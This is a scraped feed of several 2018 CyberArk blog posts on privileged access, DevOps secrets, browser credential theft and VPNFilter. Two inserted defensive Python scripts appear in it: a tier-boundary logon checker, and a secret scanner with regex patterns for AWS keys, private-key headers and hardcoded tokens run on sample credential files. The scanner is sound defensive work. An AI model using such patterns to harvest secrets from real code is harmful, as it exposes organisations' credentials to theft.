CyberArk Conjur integrates with leading DevOps tools including Ansible, Jenkins, Docker, Chef and Puppet, enabling these tools to access and use secrets and credentials managed by CyberArk Conjur. In addition, CyberArk Conjur integrates with the leading platform-as-a-service (PaaS) solutions, including Red Hat OpenShift, Kubernetes (K8S), Pivotal Cloud Foundry (PCF) and Cloud Foundry (CF).

Note: Some integrations are currently only available for CyberArk Conjur Enterprise; see here for details.

With CyberArk Conjur, secrets and credentials can be consistently managed across DevOps environments regardless of the secrets management capabilities of the native DevOps tools or platforms, which can vary significantly and are not always enterprise ready. For example, some native tools are missing critical credential rotation and audit capabilities. Importantly, this solution eliminates “islands of security” created when individual DevOps tools cannot securely share secrets with each other.

Try the Hosted Tutorial for CyberArk Conjur Open Source

It’s easy to get started. Check out the hosted CyberArk Conjur Open Source tutorial for a tour of core secrets management concepts such as storing and fetching secrets, machine authentication and authorization, and security policy as code. This is a hosted version of Conjur Open Source, so as you get started, you’ll be asked to answer a few basic questions before you get your API key. If you need help or would like to chat with your peers, join our Slack community.


]]>
Weak Security Checks and Balances Compound Privileged Access Risks https://www.cyberark.com/blog/weak-security-checks-balances-compound-privileged-access-risks/ Fri, 22 Jun 2018 15:11:52 +0000 https://www.cyberark.com/?p=25667/

The U.S. Department of Interior recently released a report concluding that two dams critical to national security operate with an elevated risk of insider attacks – too many employees have access to admin accounts and industry best practices are not followed.

The dams are among five operated by the U.S. Bureau of Reclamation. The report finds that account access isn’t always revoked when employees leave, and the agency isn’t conducting robust enough background checks for employees with high-level privileges. The full report can be found here.

Even though cyber security best practices are well documented and critical infrastructure is a known target, we continue to learn about security gaps that should be addressed with high priority. It’s a fact that employees need a certain amount of privileged access to do their job successfully. Best practices account for this – giving an appropriate level of access for employees while following a “trust but verify” approach. If proper controls are not in place and followed, organizations are exposed to risks with known and unknown consequences.

Would an employee compromise a system from within, disrupt operations and potentially conceal malicious activity? Yes, we see the headlines regularly, and this isn’t a new problem. For example, in 1999, a former employee with a pirated copy of control system software and a two-way radio transmitter wreaked havoc on a sewage system in Australia, stopping pumps and alarms and allowing thousands of gallons of sewage to flood the landscape. (The “Maroochy Incident” is discussed in an episode of the “Malicious Life” podcast: http://malicious.life/episode/episode-7-stuxnet-part-1/ ).

When it comes to government agencies and exploiting privileged access, names such as Edward Snowden, Chelsea Manning and Joshua Schulte readily come to mind.

Trying to stop insider attacks through a human-centric approach alone is impossible, simply because humans are unpredictable. What is predictable, though, is that attackers need to exploit privileged access to reach sensitive information and exfiltrate it. For this reason, security controls must be in place.

While some may argue that operational concerns override security, it is possible to achieve an effective operational and security balance. Locking down privileged access is an effective way to break the attack chain, and CyberArk has the framework and the tools to jump start and improve security for organizations both in the private and public sectors. Even more specifically, CyberArk solutions provide steps to safeguard critical infrastructure.

Some items to consider when balancing operational and security concerns:

  1. Identify and prioritize privileged access within the environment.

In order to identify which accounts need to be protected and which need to be restricted, it is important to assess the environment’s status. CyberArk’s Discovery and Audit (DNA) tool can help organizations locate privileged accounts and discover whether the accounts are currently active. Once organizations know the full status of their privileged accounts, it is easier to create a security plan to monitor and control access.

  2. Tackle the highest risk access first.

Once privileged access has been identified, the organization can plan for a privileged access security hygiene program. CyberArk has tools to promote and provide for protecting privileged access in a variety of ways, including vaulting credentials (Enterprise Password Vault), isolating sessions that use those vaulted credentials (Privileged Session Manager), and continuously monitoring usage of those privileged accounts and responding when necessary (Privileged Threat Analytics).

  3. Enforce principles of credential boundaries.

Separate assets into tiers according to their criticality, and then restrict which accounts may authenticate to the assets in each tier. For example, Tier 0 holds the absolutely mission-critical assets; Tier 1 holds any servers that do not fall into Tier 0; and Tier 2 holds endpoints. Each tiered asset should only accept accounts that belong to its own tier. The idea is that if an attacker compromises a workstation in Tier 2, the credentials found there cannot be used to move laterally to Tier 1 and Tier 0 assets.

  4. Promote cyber hygiene best practices.

It’s one thing to have the proper tools – it’s another thing entirely to utilize those tools strategically to the organization’s best advantage. Password vaulting and management, isolation of privileged account access and limiting the number of users with administrative privileges all combine to reduce the organization’s attack surface.

Removing passwords from the hands of admins, so that they don’t have to remember passwords, write them down or save them in easily accessed documents, makes their lives easier – an operational win. Vaulting those passwords and securing credentials where they are not easily breached or stolen is a win for security. Organizations do not have to choose between the two, as long as they use the right tools in the right setting.
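The tier model in item 3 is easy to state and easy to violate in day-to-day operations, so it is worth checking logon records against it. The script below is an added example, not CyberArk’s code: the asset and account inventories and the log lines are constructed, and the line format “timestamp src_host account -> dst_host” is an assumption for the example rather than any product’s log format. It goes one step beyond the text by also flagging a higher-tier credential entered from a lower-tier host, which is the other half of the same boundary (a Tier 0 password typed on a Tier 2 workstation is exposed to whatever has compromised that workstation); the sanctioned path for that case is a Tier 0 admin workstation or an isolated session through a jump host such as Privileged Session Manager.

```python
"""Check privileged logons against a Tier 0/1/2 credential boundary model.

Added example (not CyberArk's code). The inventories and the log lines are
CONSTRUCTED; the line format "timestamp src_host account -> dst_host" is an
assumption for this example, not any product's log format.
"""
from typing import Dict, List, NamedTuple, Optional

# Tier 0: mission-critical; Tier 1: every other server; Tier 2: endpoints.
ASSET_TIER: Dict[str, int] = {
    "dc01": 0, "vault01": 0, "paw01": 0,   # paw01: admin workstation kept in Tier 0
    "web01": 1, "db01": 1,
    "ws-alice": 2, "ws-bob": 2,
}
# Each account belongs to exactly one tier and may only be used inside it.
ACCOUNT_TIER: Dict[str, int] = {
    "t0-alice": 0,
    "t1-bob": 1,
    "alice": 2, "bob": 2,
}


class Logon(NamedTuple):
    ts: str
    src: str
    account: str
    dst: str


class Violation(NamedTuple):
    logon: Logon
    reason: str


def parse_log(text: str) -> List[Logon]:
    """Parse the constructed 'ts src account -> dst' lines."""
    logons = []
    for line in text.strip().splitlines():
        ts, src, account, _arrow, dst = line.split()
        logons.append(Logon(ts, src, account, dst))
    return logons


def evaluate(logon: Logon) -> Optional[Violation]:
    """Return a Violation when the logon crosses a tier boundary, else None."""
    acct = ACCOUNT_TIER.get(logon.account)
    dst = ASSET_TIER.get(logon.dst)
    src = ASSET_TIER.get(logon.src)
    if acct is None or dst is None or src is None:
        # An inventory gap is itself a finding: untiered accounts cannot be bounded.
        return Violation(logon, "account or host missing from the tier inventory")
    if dst != acct:
        return Violation(logon, f"tier {acct} account used on a tier {dst} asset")
    if src != acct:
        # The credential was entered on a host of another tier, where it can be harvested.
        return Violation(logon, f"tier {acct} credential entered from a tier {src} host")
    return None


def find_violations(log_text: str) -> List[Violation]:
    return [v for v in map(evaluate, parse_log(log_text)) if v is not None]


SAMPLE_LOG = """
2018-06-20T09:01:00Z paw01    t0-alice   -> dc01
2018-06-20T09:05:00Z ws-alice t0-alice   -> dc01
2018-06-20T09:07:00Z ws-bob   bob        -> web01
2018-06-20T09:10:00Z web01    t1-bob     -> db01
2018-06-20T09:12:00Z ws-bob   bob        -> ws-alice
2018-06-20T09:15:00Z ws-bob   svc-backup -> db01
"""

if __name__ == "__main__":
    for v in find_violations(SAMPLE_LOG):
        print(f"{v.logon.ts} {v.logon.account}@{v.logon.src} -> {v.logon.dst}: {v.reason}")
```

The first line of the sample is the clean case (Tier 0 account, Tier 0 workstation, Tier 0 target); the second shows the same account typed on an ordinary workstation, which the tier model forbids even though the destination is correct.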

Read our whitepaper to learn more about the CyberArk Privileged Access Security Cyber Hygiene program, and visit www.cyberark.com to learn more about how CyberArk solutions can assist in securing Industrial Control Systems.

]]>
Federal Cybersecurity Report Finds Majority of Agencies at Risk https://www.cyberark.com/blog/federal-cybersecurity-report-finds-majority-agencies-risk/ Wed, 20 Jun 2018 15:41:26 +0000 https://www.cyberark.com/?p=25627/

As a number of crippling breaches have illustrated, federal government agencies and departments are frequent targets in today’s advanced attacks. The White House’s Office of Management and Budget (OMB), in partnership with the Department of Homeland Security (DHS), recently conducted a cyber risk assessment of 96 agencies across 76 metrics to measure their cyber security postures. The resulting report, “Federal Cybersecurity Risk Determination Report and Action Plan,” paints a bleak picture, indicating that 74 percent of agencies are either “At Risk” or “High Risk.” This underscores the urgent need for change.

The report identifies four key areas where agencies struggle:

  1. Agencies neither understand nor have the resources to combat the current threat environment. The report finds that despite high-profile and crippling attacks, such as the U.S. Office of Personnel Management (OPM) breach, the “ability to determine threat actors’ motivations and methods for staging cyber attacks has not improved.” In fact, the report reveals that visibility or “situational awareness” is so limited that agencies could not identify the method of attack, or attack vector, in 38 percent of cyber incidents that led to information or system compromise in 2016.
  2. Lack of standardized cyber security processes and IT capabilities impacts the ability to efficiently gain visibility and combat threats. When it comes to managing privileged access to critical information and systems, the report indicates that only 55 percent of agencies limit access based on user attributes and roles—and only 57 percent review and track administrative privileges at all. This is particularly troubling, since privileged accounts provide access to these organizations’ most critical cyber infrastructure and sensitive information.
  3. Lack of visibility into what is happening on the network and the inability to detect data exfiltration. Only 27 percent of agencies reported having the ability to detect and investigate attempts to access large volumes of data—and even fewer test these capabilities annually. In other words, just one in four agencies can identify data exfiltration attempts at all. Further, the assessment found that only 30 percent of agencies have predictable, enterprise-wide incident response processes in place.
  4. No standardized or enterprise-wide processes for managing cyber security risks. The report notes, “Agencies possess neither robust risk management programs nor consistent methods for notifying leadership of cyber security risks.” It also indicates that less than 16 percent of agencies achieved the government-wide target for encrypting data at rest, despite “repeated calls from industry leaders, GAO and privacy advocates to make more robust use of data-level protections, including the encryption of data both at rest.”

Along with greater accountability, increased awareness and consolidation/standardization of security resources to enhance efficiencies, the report’s recommendations include implementation of existing government guidelines and frameworks, such as FISMA/NIST SP 800-53, NERC CIP, HSPD-12 and the Department of Homeland Security CDM Program. Due to the powerful, unfettered access privileged accounts provide, privileged account protection and threat detection are at the center of many of these requirements.

Though this report includes sobering statistics, significant progress is possible. Agencies must first clearly understand their cyber security responsibilities tied to these existing frameworks. From there, they should thoroughly assess their current cyber security tools and processes, looking for ways to optimize them to address these requirements.

But they don’t have to go it alone. CyberArk is the recognized leader in protecting privileged access, and we have multiple Department of Defense customers and installations of the CyberArk Privileged Access Security Solution across the U.S. Federal Government in on-premises, cloud and ICS environments, and throughout the DevOps pipeline.

Many large-scale deployments in distributed and virtual environments are based on the CyberArk Privileged Access Security Hygiene Program, a proven, systematic approach that helps agencies to address their top privileged access control goals—from eliminating irreversible network takeover attacks to securing SaaS admins and privileged business users.

To learn more about our work in protecting federal agencies from advanced threats and supporting compliance while establishing and maintaining strong privileged access security hygiene, please explore our federal industry resources for more detail.

]]>
Privileged Account Management is #1 Security Project in 2018 for CISOs, Says Gartner* https://www.cyberark.com/blog/privileged-account-management-1-security-project-2018-cisos-says-gartner/ Mon, 18 Jun 2018 19:13:00 +0000 https://www.cyberark.com/?p=25584/

Recently, we attended the 2018 Gartner Security & Risk Management Summit. The event is always a valuable opportunity to learn from top CISOs and security and risk management professionals, to explore leading-edge research and to discuss emerging cyber security trends.

Although there were a number of excellent presentations throughout the week, one in particular stood out based on its pragmatic guidance and actionable takeaways. It also recognized that while organizations run long-term strategic security programs, they need to demonstrate quick wins along the way.

In his talk, “Top 10 Security Projects for Security and Risk Management Organizations,” Gartner VP and Distinguished Analyst Neil MacDonald outlined the top 10 security projects for 2018, based upon a number of criteria: the emerging technologies that support the project are not yet mainstream; the project helps deliver against the CARTA (continuous adaptive risk and trust assessment) approach; and the project has high risk reduction versus resources required as compared to alternatives.** MacDonald identified privileged account management (PAM) as the #1 focus for organizations.

In our opinion, strategic privileged account management projects should be expanded into a longer term program. Comprehensive privileged account management that extends protections to other users and applications across the enterprise, in the cloud, at the endpoint and throughout the DevOps pipeline, will take an integral project to the next level.

Ready to get started?  Start by prioritizing the implementation of controls for protecting privileged credentials to drive tangible results quickly. A CyberArk report, “Rapid Risk Reduction: A 30-Day Sprint to Protect Privileged Credentials,” outlines a proven framework for an intensive sprint of approximately 30 days to help reduce risk and achieve quick wins.

Don’t stop there. After demonstrating the value of protecting privilege across high-risk areas to key stakeholders, it’s time to take a phased approach to expand coverage to new areas, evolving these projects into long-term, business-critical cyber security programs.  For guidance, we encourage you to download the CyberArk  Privileged Access Security Hygiene whitepaper.

*Gartner, Smarter with Gartner, Gartner Top 10 Security Projects for 2018, June 6, 2018

**Gartner, Gartner Security & Risk Management Summit 2018 agenda, https://www.gartner.com/en/conferences/na/security-risk-management/agenda/track

]]>
Is It Time for a Cyber Hygiene Check Up? https://www.cyberark.com/blog/time-cyber-hygiene-check/ Thu, 14 Jun 2018 15:49:09 +0000 https://www.cyberark.com/?p=25563/

The National Institute of Standards and Technology (NIST) recently released version 1.1 of its Cybersecurity Framework, which incorporates feedback received from public comments and workshops over the past two years. Though the document is chiefly designed to help improve cyber security risk management in critical infrastructure, the Framework’s principles and best practices can be followed by organizations across industries in order to improve their security posture.

Many of the Cybersecurity Framework’s refinements center around cyber hygiene—actionable steps that organizations can take to “clean up” current weaknesses and potential vulnerabilities. These steps are particularly important in the wake of massive attacks such as WannaCry. In fact, post-attack studies show that WannaCry’s impact could have largely been prevented if basic security best practices had been applied.

As the Cybersecurity Framework underscores, one of the most effective preventative steps an organization can take to bolster its security program is to secure privileged accounts, credentials and secrets. Attackers continually look for new ways to exploit an organization’s vulnerabilities, so a “set it and forget it” approach is sure to fail, especially when it comes to privileged access, since a company’s sensitive applications and systems can change as the company grows or changes direction. For example, if your organization secured privileged access for Windows built-in accounts on systems with access to sensitive data, be sure not to stop there but commence work on the next set of systems that deliver the most risk reduction, given the time and effort required.

Since the enterprise infrastructure is ever-changing, it’s important to look for new infrastructure in the cloud and new SaaS applications that could have access to sensitive business data. To have the strongest defense against attackers, organizations need to ensure their privileged access security program is up to date and continues to protect their most critical infrastructure, applications, customer data, intellectual property and other vital assets.

The CyberArk Privileged Access Security Cyber Hygiene Program

To help organizations establish and maintain a strong privileged access security program, CyberArk developed customized, step-by-step goals and an actionable process for achieving the highest level of protection against common attacks on privileged accounts, credentials and secrets. The program addresses these types of attacks:

  • Irreversible network takeover attacks: Attackers establish persistence in an organization by performing an attack that is not only hard to identify but also so intrusive that the business must rebuild to remove the attacker—e.g., a Kerberos attack, such as a Golden Ticket.
  • Infrastructure account attacks: Attackers leverage powerful default infrastructure accounts that exist on-premises or in cloud environments and are seldom used in day-to-day operations, but can provide the attacker with excellent opportunities for access to highly sensitive data.
  • Attacks that leverage lateral movement: Attackers often steal credentials by gaining a foothold on endpoints and then moving laterally, for example by using Pass-the-Hash techniques, in order to steal elevated permissions.
  • Targeting credentials used by third-party applications: Attackers compromise third-party applications that are used to perform operations such as deep scans in order to steal their embedded privileged credentials. From here, they execute attack goals while completely circumventing the targeted company’s defenses.
  • Targeting *NIX SSH keys: Attackers leverage unmanaged SSH keys in order to log in with root access and take over the *NIX technology stack. Unix/Linux systems house some of an enterprise’s most sensitive assets, and Linux systems are increasingly deployed in the cloud. Individual accounts and credentials—including SSH keys—used to gain root privileges are often overlooked by security teams.
  • Targeting DevOps secrets in the cloud and on-premises: Attackers can compromise secrets embedded in code and Continuous Integration/Continuous Deployment (CI/CD) tools, in order to exploit the environment for more pervasive access.
  • Targeting SaaS admins and privileged business users: Attackers steal credentials used by SaaS administrators and privileged business users, in order to get high level and stealthy access to sensitive systems.
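Two of the attack types above, secrets embedded in code and CI/CD tooling and unmanaged private keys, start from material that can be found by scanning a repository or build directory before an attacker does. The scanner below is an added example for both bullets and is not CyberArk’s tooling: the sample files are constructed, the two AWS values are the non-functional example values from AWS’s own documentation, and the credential patterns are common shapes rather than a complete catalogue. It combines fixed patterns (an AWS access key id, a PEM private-key header) with an entropy test on values assigned to credential-looking names, so that placeholders such as "changeme" and references to an external secret store are not reported.

```python
"""Find credentials embedded in code and configuration files (added example).

Not CyberArk's tooling. The sample files are CONSTRUCTED; the two AWS values are
the non-functional examples from AWS's documentation, and the patterns are common
credential shapes, not a complete catalogue.
"""
import math
import re
from typing import Dict, List, NamedTuple


class Finding(NamedTuple):
    path: str
    line_no: int
    kind: str
    evidence: str          # the offending line with the secret value masked


# Shapes that are credentials on their own, whatever they are assigned to.
PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "private_key_block": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH |DSA )?PRIVATE KEY-----"),
}
# name=value / name: value where the name contains a credential keyword.
ASSIGNMENT = re.compile(
    r"(?i)([A-Za-z0-9_.-]*(?:password|passwd|secret|token|api[_-]?key)[A-Za-z0-9_]*)"
    r"\s*[:=]\s*['\"]?([^'\"\s#]+)"
)


def shannon_entropy(s: str) -> float:
    """Bits per character; random-looking secrets score well above words."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in (s.count(ch) for ch in set(s)))


def mask(value: str) -> str:
    return value[:4] + "***"


def scan_text(path: str, text: str, min_len: int = 12,
              min_entropy: float = 3.5) -> List[Finding]:
    findings: List[Finding] = []
    for no, line in enumerate(text.splitlines(), start=1):
        for kind, rx in PATTERNS.items():
            hit = rx.search(line)
            if hit:
                shown = line.strip()
                if kind != "private_key_block":
                    shown = shown.replace(hit.group(0), mask(hit.group(0)))
                findings.append(Finding(path, no, kind, shown))
        m = ASSIGNMENT.search(line)
        if not m:
            continue
        name, value = m.group(1), m.group(2)
        if value.startswith(("${", "{{")):
            continue   # reference to a secret store or template variable, not a literal
        if len(value) >= min_len and shannon_entropy(value) >= min_entropy:
            findings.append(Finding(path, no, f"hardcoded_{name.lower()}",
                                    line.strip().replace(value, mask(value))))
    return findings


def scan_files(files: Dict[str, str]) -> List[Finding]:
    return [f for path, text in files.items() for f in scan_text(path, text)]


SAMPLE_FILES: Dict[str, str] = {   # constructed repository contents
    "deploy.sh": "#!/bin/sh\n"
                 "export AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE\n"
                 "export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\n"
                 "aws s3 sync build/ s3://releases/\n",
    "config.yml": "db:\n"
                  "  user: app\n"
                  "  password: changeme\n"
                  "  secret: ${CONJUR_DB_SECRET}\n"
                  "api_token: 'Xk9vQ2mL8pR4tWzB7nJ3'\n",
    "app.py": "import os\n"
              'TOKEN = os.environ["API_TOKEN"]\n',
    "id_rsa": "-----BEGIN RSA PRIVATE KEY-----\n"
              "<constructed key body omitted>\n"
              "-----END RSA PRIVATE KEY-----\n",
}

if __name__ == "__main__":
    for f in scan_files(SAMPLE_FILES):
        print(f"{f.path}:{f.line_no} {f.kind}: {f.evidence}")
```

Run against the sample it reports the two AWS values, the high-entropy API token and the private-key file, and stays silent on the low-entropy placeholder, the `${...}` reference and the value read from the environment. The entropy threshold is the usual tuning knob: lower it and more short passwords are caught at the cost of more noise from version strings and hashes.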

The CyberArk Privileged Access Security Cyber Hygiene Program leverages the extensive experience the CyberArk Security Services team has gained from responding to significant data breaches, including those at many large organizations. Often these breaches have resulted from some of the most common attacks involving privileged access, and each example provides valuable insights into how attackers operate and exploit an organization’s vulnerabilities. Implementing this type of program effectively should help organizations achieve greater risk reduction in less time, and help satisfy security and regulatory objectives with fewer internal resources.

Read our whitepaper to learn more about the CyberArk Privileged Access Security Cyber Hygiene Program and visit here to learn more about how to ramp up your privileged access security program with CyberArk Security Services.

]]>
Maximize Your Investments in Identity Governance and Privileged Access Security with CyberArk and SailPoint https://www.cyberark.com/blog/maximize-investments-identity-governance-privileged-access-security-cyberark-sailpoint/ Mon, 11 Jun 2018 14:00:53 +0000 https://www.cyberark.com/?p=25396/

Privileged access security is too often implemented independently from an identity governance solution, which can create siloes, inefficiencies and prevent full visibility across an identity’s user access lifecycle. To enhance the reliability and flexibility of an organization’s security stack, privileged access security data should be integrated into effective identity governance and access management strategies.

The CyberArk Privileged Access Security Solution integration with SailPoint IdentityIQ enables customers to strengthen their security posture by automatically and consistently applying governance policies to all identities—including privileged identities (individuals and applications) and access entitlements. By not having to toggle back and forth from one solution to the other, organizations can gain comprehensive visibility into all accounts and govern them from a centralized location. This synchronization also enables security teams to easily consolidate certifications for privileged and non-privileged accounts and grant access more rapidly to maximize productivity, while reducing operational time and cost.

Join CyberArk and SailPoint in an “On the Front Lines Insider” webinar on June 26th at either 9:00 a.m. or 2:00 p.m. ET to discover ways to maximize your investments in identity governance and privileged access security. Register here to save a spot for this technical presentation.

You can also learn more about the power of integrated identity governance and privileged access security in this Sailpoint blog post and explore details on the CyberArk Privileged Access Security Solution integration with SailPoint IdentityIQ on the CyberArk Marketplace.


]]>
Think Twice Before You Click to Save Credentials in a Web Browser https://www.cyberark.com/blog/think-twice-click-save-credentials-web-browser/ Fri, 01 Jun 2018 13:32:33 +0000 https://www.cyberark.com/?p=25195/

It’s increasingly common: attackers target credentials stored within web browsers. Such attacks could happen on any of the well-known browsers that dominate the market today, including Chrome, Firefox and Internet Explorer. The motivation and method behind the attacks vary, but the message is clear – browsers are a soft target on today’s hackers’ short list.

Why is this so?

Every browser offers a means to save credentials for online/web accessible systems. In fact, the option is frequently displayed as a pop-up box that highlights “save” as the default.

This simple, time-saving step encourages adoption of the feature. Users, after all, like the convenience of not having to enter credentials every time they visit their favorite website or frequently used system. The information stored in the browser is publicly available to programs that the user runs. But despite the convenience, there is a major downside: credentials saved in a browser are a natural target for phishing attacks and provide easy access to the targeted user’s systems.

As seen in the Vega Stealer malware, there can be a hefty price to pay when users opt to press that “save credential” checkbox. Victims of this type of attack can unintentionally expose sensitive, browser-accessible IP. The malware is in use across multiple industries and particularly prevalent in marketing, advertising, public relations, retail and manufacturing. This is likely because these targets tend to have higher-than-average usage of third-party and SaaS solutions in operation.

Another credential-stealing malware targets the crypto-chat app Telegram. Once downloaded, the malware extracts browser credential data that allows it to restore cache and map files into an existing Telegram desktop installation. If the session was open, the attacker has the chance to access the victim’s session, contacts and previous chats without their knowledge.

Want to learn how to mitigate this risk without impacting your end-user systems?

Join us for a CyberArk On the Front Lines webcast titled “Protecting the Privileged Pathway: Learn how from demos of five attack scenarios that exploit privilege,” on June 5, 2018. There are two sessions that you can join: 9 a.m. and 2 p.m. ET.

During these sessions, our endpoint privileged access security experts will explain the finer points of how attackers use targeted phishing attacks to steal credentials with Mimikatz. They will also demonstrate several escalations, including browser credential harvesting. Attendees will gain best practices for mitigating risk using CyberArk Endpoint Privilege Manager. For those interested in learning how current, real-world attacks take place, along with ways to prevent them, this webcast is for you.

To learn more about how to mitigate attacks on endpoints across your enterprise, download our CyberArk Endpoint Privilege Manager datasheet.

Register today, and we’ll see you On the Front Lines!

]]>
VPNFilter Malware Shines Light on Router Risks and Possibilities https://www.cyberark.com/blog/vpnfilter-malware-shines-light-router-risks-possibilities/ Thu, 31 May 2018 14:41:05 +0000 https://www.cyberark.com/?p=25130/

Recently discovered VPNFilter malware has infected an estimated 500,000 routers in 54 countries. The FBI is urging consumers to reboot routers, but enterprises also need to take note. Unsecured routers introduce significant risk. Routers oftentimes don’t have the same security controls as servers or other devices. However, a router with network access could allow a threat actor to infect other network-connected assets.

Even in cases where routers are segregated by a demilitarized zone (DMZ), it is possible for business users on the web to unwittingly pull a malicious payload inside the network – letting a threat actor in.

VPNFilter and other malware types provide threat actors with persistent functionalities, including network sniffing, remote code execution and router firmware modifications. These functionalities are noteworthy because they support three possible attack scenarios:

  • Reflective DDoS attack – In this scenario, the infected routers become an enormous botnet awaiting the command to flood a specific website or web service with high traffic volume, rendering it unavailable. The Mirai malware that infected about 500,000 IoT devices two years ago demonstrates the order of magnitude such attacks can reach, in two different attacks: on krebsonsecurity.com (620 Gbps) and on the DNS provider Dyn (an attack that was said to reach 1 Tbps).
  • Tunneled attack – In this scenario, the infected routers are used as hubs for attacks on other third parties. The infected routers tunnel the attack to the targeted party while concealing the original source of the attack. Tunneling the attack through compromised devices is a common practice used by threat actors to cover their tracks. As many of the VPNFilter-infected routers are located in Ukraine, and the malware shares code with BlackEnergy, it is believed that the routers will be used as proxies as part of the ongoing offensive campaign targeting Ukraine.
  • Network foothold – In this last scenario, the routers are used as a penetration point into the router’s internal network. Controlling the router in a network provides wide access to the network traffic passing through it, and it provides threat actors with the opportunity to control and redirect that traffic. This opens up the attack surface of the network, as the threat actors will be able to inject code or redirect the traffic to malicious sites.

Because the VPNFilter malware targeted home and small business routers, including NetGear, Linksys, MikroTik and TP-Link, the DDoS attack and tunneled attack scenarios are most probable.

The VPNFilter malware exploits known vulnerabilities in the different routers and then pulls stage two and stage three payloads, adding more functionality to the malware. Hence, to mitigate the risk introduced by VPNFilter and other similar malware variants, it is enough to update the router firmware. Remediation, on the other hand, requires a “factory reset” of the router to remove the persistent malware components.

Large organizations that haven’t yet been targeted by VPNFilter should take into account the fact that the perimeter might not only be breached, providing initial narrow access to a threat actor; the perimeter might already be owned by the threat actors, providing a wide attack surface.

In such a scenario, privileged access security is the last – and arguably most important – line of defense, preventing the threat actors from taking control of the network.

]]>
Six Core Principles for Establishing DevOps Security at Scale https://www.cyberark.com/blog/six-core-principles-establishing-devops-security-scale/ Mon, 28 May 2018 13:15:06 +0000 https://www.cyberark.com/?p=24929/

The development and operations teams at organizations worldwide have adopted DevOps methodologies to deliver applications quickly and cost-effectively. With this surge of adoption comes the need for greater awareness of the associated risks. For example, consider highly publicized security breaches linked to DevOps processes in recent months.

DevOps and security leaders increasingly recognize that DevOps requires a fresh approach to security – one that mitigates risk and uncertainty without impeding velocity. By following six guiding principles, organizations can more effectively accelerate the pace of innovation while enabling DevOps security at scale:

  1. Instantiate Security Policy as Code. “Infrastructure as Code” is a cornerstone of DevOps. When applied to security—by instantiating and managing security policy as code—organizations can better control access to critical systems by eliminating time-intensive, error-prone processes for configuring permissions and managing passwords.
  2. Instill Separation of Duties. By clearly defining distinct roles and responsibilities within a DevOps team, businesses can optimize operations, minimize risks and accelerate the pace of development.
  3. Focus on Flow and Velocity. Advanced workflow scheduling and management tools allow teams to visualize workflows, identify bottlenecks and eliminate inefficiencies. By incorporating security into these analyses, DevOps teams can detect and address security issues early on.
  4. Treat Security as a First-Class Citizen. By instituting strong security systems and following good security hygiene practices throughout the application lifecycle, development teams can reduce vulnerabilities, improve their security posture and mitigate risks.
  5. Automate DevOps Security. Effective DevOps teams use automation to accelerate application lifecycle management and remove latency. They should take a similar approach to security, leveraging automation to improve their security posture while avoiding barriers to application development and delivery.
  6. Embrace New Technologies. Traditional approaches for security (designed to protect legacy IT environments) often aren’t well suited for today’s dynamic environments. Forward-looking security teams embrace new security technologies and models while leveraging the policies and lessons learned from more traditional environments.

To learn more about delivering security that works at DevOps velocity, download CyberArk’s eBook, 6 Core Principles for Establishing DevOps Security at Scale.

For more information about CyberArk’s powerful secrets management solution, specifically designed to help developers easily and conveniently meet the security requirements of agile and scalable DevOps environments, read about CyberArk Conjur Enterprise. You can also try Conjur Open Source. 

]]>
GDPR Is Here: Resources for Your Compliance Journey https://www.cyberark.com/blog/gdpr-resources-compliance-journey/ Fri, 25 May 2018 12:35:39 +0000 https://www.cyberark.com/?p=24923/

Today is the day. After all the build-up, the GDPR deadline is officially here. From the inevitable next breach, we will more fully understand how well organizations prepared and the implications of this far-reaching regulation.

The regulation is designed to better address the protection of personal data, so much of the buzz around GDPR has been focused on end-users. Of course, GDPR goes much deeper than that. At the heart of GDPR compliance is a mandate to manage who has access to personal data and how that access is protected. CyberArk’s David Higgins shares an example in this week’s CRN piece, 10 Security Experts On What the Industry Doesn’t Get About GDPR, noting, “The hidden layer of any organization is the IT administrators since they have access to the data needed to keep the lights on and the systems running. For this reason, attackers looking to steal data often target IT administrators rather than human resources or finance leaders since the former usually have access to more valuable data.”

A strong privileged access security strategy, which provides end-to-end protection of privileged accounts, credentials and secrets that have access to the systems and applications containing personal data, is critical to ensure your organization’s IT administrators do not find themselves in the cross-hairs of regulators. A sound strategy will also help you to avoid the financial penalties and liabilities associated with GDPR.

Over the past year, we’ve worked closely with our customers and partners to help prepare for the GDPR. As you continue on your compliance journey, tap our comprehensive library of free GDPR resources available to help you mitigate risk, avoid potential fines and liability and, most important, implement a stronger enterprise security posture moving forward.


]]>
Where Are You Placing Your Endpoint Security Bets? https://www.cyberark.com/blog/placing-endpoint-security-bets/ Tue, 22 May 2018 13:04:30 +0000 https://www.cyberark.com/?p=24851/

Defense-in-depth is a common security strategy that often includes a combination of endpoint security products, including next generation anti-virus (NGAV), traditional anti-virus (AV) and/or endpoint detection and response (EDR). But as attacks and breaches continue to surge, I can’t help but wonder: are these technologies missing the point? The CyberArk Endpoint Privilege Manager (EPM) and products in NGAV (including traditional AV) and EDR primarily share the same end goal of preventing attackers from stealing your IP, ruining your brand and/or taking off with your sensitive customer data. But each one takes a fundamentally different approach. We have discussed some of the limitations of these technologies previously, but as a refresher, NGAV and EDR primarily look to identify each individual threat with their proprietary technology, whereas EPM primarily looks to control which applications can run, and how they run, with privilege, as well as to protect against credential theft.

What some endpoint products miss is that if you’re running as an admin, it’s only a matter of time before the bad guys “get in and own you.” This even appears in some of their corporate messaging. No single endpoint product can claim a perfect record for effectively stopping an attacker from getting in. Furthermore, given that most attacks are initiated via a phishing attack vector, such as an email that tries to lure the victim into opening a document, executing content, or visiting a fake website, you have to assume breach is inevitable given enough time and effort on the attacker’s part.

Just like in Vegas, it’s a numbers game, and the house always wins in the end (oh, and you’re not the house). Hackers know this and expect that even in the most secure environments, even with members of the IT admin teams that should know better, mistakes do happen, clicks eventually happen, and unfortunately pwns happen. If you are like one of the many companies recently surveyed that reported that most users (86 percent) still operate with admin/elevated privileges, you are on the wrong side of that bet. As a result, the attackers will have a privilege pathway paved for them.

Privileged access is what enables attackers to achieve their goals. For this reason and others, companies should be using an endpoint security solution that also efficiently and effectively implements least privilege. Think about it: If your end users are not running as admin, then even when an attacker evades an NGAV product or circumvents detection by an EDR product, the attacker is exceedingly unlikely to move from the point of origin. Instead, they will be contained on the endpoint. It’s really that simple, but getting there is not always so simple (otherwise everyone would be doing it).

